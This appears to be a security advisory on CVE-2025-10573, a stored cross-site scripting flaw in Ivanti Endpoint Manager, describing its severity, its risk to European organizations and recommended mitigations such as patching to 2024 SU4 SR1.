CVE-2025-10573 is a stored Cross-site Scripting (XSS) vulnerability classified under CWE-79, affecting Ivanti Endpoint Manager versions prior to 2024 SU4 SR1. The flaw arises from improper neutralization of input during web page generation, allowing malicious input to be stored and later rendered in an administrator's browser context without adequate sanitization. This enables a remote, unauthenticated attacker to inject arbitrary JavaScript code that executes when an administrator views the compromised content. The attack requires user interaction, such as clicking a crafted link or viewing a manipulated interface element, but no authentication is necessary, increasing the attack surface. The vulnerability impacts confidentiality by potentially exposing sensitive administrative data, integrity by enabling unauthorized actions through script execution, and availability by possibly disrupting management functions. The CVSS v3.1 score of 9.6 reflects its critical severity, with attack vector network-based, low attack complexity, no privileges required, user interaction needed, and scope changed due to potential impact beyond the vulnerable component. Although no active exploits have been reported, the high severity and administrative context make this a significant threat. Ivanti Endpoint Manager is widely used for endpoint management, patching, and security compliance, making this vulnerability particularly concerning for organizations relying on it for centralized control.

For European organizations, this vulnerability poses a severe risk to the security and stability of endpoint management infrastructure. Successful exploitation could lead to unauthorized administrative access, data leakage, and manipulation of endpoint configurations, potentially disrupting business operations. Given the critical role of Ivanti Endpoint Manager in managing large fleets of devices, attackers could leverage this vulnerability to propagate malware, exfiltrate sensitive information, or disable security controls. This is especially impactful for sectors with stringent regulatory requirements such as finance, healthcare, and government, where administrative compromise could lead to compliance violations and reputational damage. The requirement for user interaction somewhat limits automated exploitation but does not significantly reduce risk due to the high value of administrator sessions targeted. The vulnerability could also be leveraged in targeted attacks against European organizations with high-value assets or critical infrastructure, amplifying the potential damage.

Organizations should immediately upgrade Ivanti Endpoint Manager to version 2024 SU4 SR1 or later, where the vulnerability is patched. Until the update is applied, administrators should minimize exposure by restricting access to the management console via network segmentation and VPNs, and by enforcing strict access controls and multi-factor authentication to reduce the risk of session hijacking. Implementing Content Security Policy (CSP) headers can help mitigate the impact of injected scripts by restricting script execution sources. Additionally, input validation and output encoding should be reviewed and enhanced to prevent malicious input from being stored or rendered. Monitoring administrative sessions for unusual activity and employing web application firewalls (WAFs) with XSS detection capabilities can provide additional layers of defense. User awareness training for administrators to recognize phishing or suspicious links can reduce the likelihood of user interaction exploitation. Regular security audits and penetration testing focused on web interface vulnerabilities are recommended to detect similar issues proactively.